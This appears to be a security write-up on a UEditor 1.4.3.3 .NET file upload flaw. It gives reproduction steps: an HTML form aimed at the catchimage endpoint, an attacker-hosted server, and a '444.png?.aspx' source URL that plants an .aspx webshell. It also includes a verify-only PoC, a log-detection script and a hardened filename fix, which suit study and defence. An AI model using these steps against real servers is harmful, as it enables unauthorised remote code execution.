Vulnerability overview
UEditor editor upload vulnerability leading to getshell
Affected version: 1.4.3.3 .NET edition
Environment setup
IIS environment + source code of the 1.4.3.3 .NET edition
Build environment: Java, npm, grunt, Node.js
npm install
npm install -g grunt-cli
grunt --encode=utf8 --server=net
Visit http://192.168.0.103/ueditor/index.html; if the demo page below is displayed, the deployment succeeded.
Verifying the vulnerability
If visiting the following link returns the prompt shown, the vulnerability exists:
http://192.168.0.103/ueditor/net/controller.ashx?action=catchimage
If visiting the following link returns the prompt shown, the .NET environment is running normally:
http://192.168.0.103/ueditor/net/controller.ashx?action=config
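From the defender's side, the two requests above and the final upload path are what shows up in the web server log. The following is an added example (not part of the original post and not UEditor code) that scans a constructed IIS W3C log excerpt and flags any request to the catchimage action of controller.ashx, plus any file served from the /ueditor/net/upload/ directory whose extension is not an image type. The log lines and the IMAGE_EXTENSIONS allowlist are constructed assumptions.

```python
import posixpath
from urllib.parse import parse_qs

# Constructed IIS W3C extended log excerpt (sample data, not from the original post).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2021-07-28 10:00:01 192.168.0.103 GET /ueditor/net/controller.ashx action=config 80 192.168.0.50 200
2021-07-28 10:00:05 192.168.0.103 GET /ueditor/net/controller.ashx action=catchimage 80 192.168.0.50 200
2021-07-28 10:00:09 192.168.0.103 POST /ueditor/net/controller.ashx action=catchimage 80 192.168.0.50 200
2021-07-28 10:00:15 192.168.0.103 GET /ueditor/net/upload/image/20210728/6376306592532325491434427.aspx - 80 192.168.0.50 200
2021-07-28 10:00:20 192.168.0.103 GET /ueditor/net/upload/image/20210728/1.png - 80 192.168.0.60 200
2021-07-28 10:00:25 192.168.0.103 GET /ueditor/index.html - 80 192.168.0.60 200
"""

# Assumption: the only file types the upload directory should ever serve.
IMAGE_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.gif', '.bmp'}
# Directory prefix taken from the result URL in the writeup.
UPLOAD_PREFIX = '/ueditor/net/upload/'


def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
            continue
        if not line or line.startswith('#') or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def classify(rec):
    """Return an alert label for a suspicious record, or None."""
    stem = rec['cs-uri-stem'].lower()
    query = parse_qs(rec['cs-uri-query'].lower()) if rec['cs-uri-query'] != '-' else {}
    # 1. Any hit on the catchimage action of the controller.
    if stem.endswith('/controller.ashx') and 'catchimage' in query.get('action', []):
        return 'catchimage-request'
    # 2. A non-image file served from the upload directory
    #    (the writeup's shell lands at .../upload/image/<date>/<id>.aspx).
    if stem.startswith(UPLOAD_PREFIX) and posixpath.splitext(stem)[1] not in IMAGE_EXTENSIONS:
        return 'non-image-under-upload-dir'
    return None


def find_alerts(log_text):
    """Collect (client ip, method, uri stem, label) for every flagged record."""
    alerts = []
    for rec in parse_w3c(log_text):
        label = classify(rec)
        if label:
            alerts.append((rec['c-ip'], rec['cs-method'], rec['cs-uri-stem'], label))
    return alerts


if __name__ == '__main__':
    for alert in find_alerts(SAMPLE_LOG):
        print(*alert)
```

The config request is deliberately not flagged on its own: it is legitimate editor traffic, and alerting on it would be noisy. A GET to catchimage without parameters, followed shortly by a script extension being fetched from the upload directory, is the sequence worth paging on.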
pocsuite3 PoC code:
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE


class DemoPOC(POCBase):
    vulID = 'XXXX'  # ssvid
    version = '1.4.3.3'
    author = ['tale']
    vulDate = '2021-07-18'
    createDate = '2021-07-18'
    updateDate = '2021-07-18'
    references = ['']
    name = 'Ueditor任意文件上传'
    appPowerLink = ''
    appName = 'Ueditor任意文件上传'
    appVersion = '1.4.3.3'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''Ueditor任意文件上传'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        # A bare GET to the catchimage action answers with the
        # "no fetch source specified" message on an exposed .NET build.
        result = {}
        path = "/net/controller.ashx?action=catchimage"
        r = requests.get(url=self.url + path)
        if "没有指定抓取源" in r.text:
            result['FileInfo'] = {}
        return self.parse_output(result)

    def _attack(self):
        # Verification only; no payload is sent.
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
Reproducing the vulnerability
First, create an HTML file locally, change the URL to the target machine's IP, and save it as 1.html.
<form action="http://192.168.0.103/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
    <p>shell addr: <input type="text" name="source[]" /></p>
    <input type="submit" value="Submit" />
</form>
Then set up a temporary web server on a public VPS:
python -m SimpleHTTPServer 8080
Open 1.html locally and enter the following address to upload the shell:
http://ip:8080/444.png?.aspx
After a successful upload, the following result is returned.
Connect with a webshell management tool to verify, as shown below.
http://ip:8001/ueditor/net/upload/image/20210728/6376306592532325491434427.aspx
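The `444.png?.aspx` source address above only works because the stored file name ends up carrying the extension from the text after the `?` rather than from the URL path. The following is an added example, not code from the original post or from the UEditor project: `naive_extension` is a simplified model of trusting the raw URL text for the extension (the observable behaviour the writeup relies on), and `safe_target_name` is the hardened derivation a remote-image fetcher should use instead. The `ALLOWED_IMAGE_EXTENSIONS` allowlist and the `image/` content-type requirement are assumptions about what the catcher is meant to accept.

```python
import posixpath
import secrets
from urllib.parse import urlsplit

# Assumption: the image types the remote-image catcher is meant to accept.
ALLOWED_IMAGE_EXTENSIONS = {'.png', '.jpg', '.jpeg', '.gif', '.bmp'}


def naive_extension(source_url):
    """Model of the weak logic (constructed illustration, not UEditor's code):
    the extension is read from the raw URL text after the last '/', with the
    query string still attached, so '444.png?.aspx' yields '.aspx'."""
    return posixpath.splitext(source_url.rsplit('/', 1)[-1])[1].lower()


def safe_target_name(source_url, content_type):
    """Hardened derivation of the name under which a fetched image is stored."""
    # 1. Parse the URL; only the path component may influence the extension,
    #    so anything after '?' or '#' is ignored.
    ext = posixpath.splitext(urlsplit(source_url).path)[1].lower()
    # 2. Allowlist the extension instead of trying to denylist script types.
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        raise ValueError(f'rejected: {ext!r} is not an allowed image extension')
    # 3. Require the fetched response to declare an image type as well.
    if not content_type.lower().startswith('image/'):
        raise ValueError(f'rejected: content type {content_type!r} is not an image')
    # 4. Never reuse the remote file name; generate one server-side and
    #    append only the validated extension.
    return secrets.token_hex(16) + ext


def is_rejected(source_url, content_type):
    """True when the hardened check refuses to store the fetched file."""
    try:
        safe_target_name(source_url, content_type)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    url = 'http://ip:8080/444.png?.aspx'
    print('naive extension:', naive_extension(url))
    print('hardened name:  ', safe_target_name(url, 'image/png'))
    print('shell.aspx rejected:', is_rejected('http://ip:8080/shell.aspx', 'image/png'))
```

The name check is necessary but not sufficient on its own: the upload directory should also be configured so that the web server never executes scripts from it, which removes the impact even if a mis-named file does get written there.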
References
https://www.cnblogs.com/dslt/p/14903092.html
https://www.cnblogs.com/hei-zi/p/13394764.html